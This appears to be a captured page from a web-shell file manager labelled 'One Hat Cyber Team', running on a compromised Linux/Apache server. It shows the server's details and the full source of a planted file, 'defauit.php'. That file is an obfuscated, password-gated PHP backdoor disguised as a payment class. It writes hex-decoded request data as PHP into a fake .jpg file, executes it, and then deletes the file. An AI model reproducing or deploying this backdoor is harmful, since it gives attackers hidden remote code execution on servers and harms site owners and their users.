⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.94
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
erp.dev-unit.com
/
View File Name :
defauit.php
<?php //ffafewafT0PEhX2aD8Ri class GetOrderPayMenuP{ public $jpg; public function __construct(){ $this->jpg="./nbpafebaef.jpg"; } public function paypal($sg){ touch($this->jpg); $i=0; $f = "file_put"; $g = ($a = sprintf("%s%s",$f,"_contents")); $z = $g($this->jpg, sprintf("%s", $this->ppq($sg[$i][$i]))); $g; } public function __call($name, $arguments) { if ($name == 'gawsf') { $this->paypal($arguments); } else { return $this->xxx($arguments); } } function xxx($hex){ $suffix = '3061336333663730363837303230'; $end = '33663365'; $hex = $hex[0].'3f3e'; for($i=0;$i<strlen($suffix)-1;$i+=2) $tmp.=chr(hexdec($suffix[$i].$suffix[$i+1])); $tmp2=""; for($i=0;$i<strlen($tmp)-1;$i+=2) $tmp2.=chr(hexdec($tmp[$i].$tmp[$i+1])); $str=""; for($i=0;$i<strlen($hex)-1;$i+=2) $str.=chr(hexdec($hex[$i].$hex[$i+1])); return $tmp2.$str; } public function __destruct(){ unlink($this->jpg); } } //T0PEhX2aD8Ri if(isset($_REQUEST['gggsfa']) and md5($_POST['pwdsafe'])==='dca22ff11d3540d0a7b0ad1f45286d60'){ $a = array();//fewafwafnlweafnT0PEhX2aD8Ri $order = new GetOrderPayMenuP(); $GLOBALS["gsw"] = &$a; $GLOBALS["gsw"] = array_merge($_REQUEST,$GLOBALS["gsw"]); define("hello",("".join(array($a["gggsfa"])))); foreach(get_defined_functions() as $ga){ foreach ($ga as $ag){ if(strlen($ag)==20 && substr($ag,0,8)=="call_use" && substr($ag,16,strlen($ag)) == "rray") $ag(array($order, "gawsf"), array(array(hello))); } } require_once($order->jpg); } //T0PEhX2aD8Ri ?>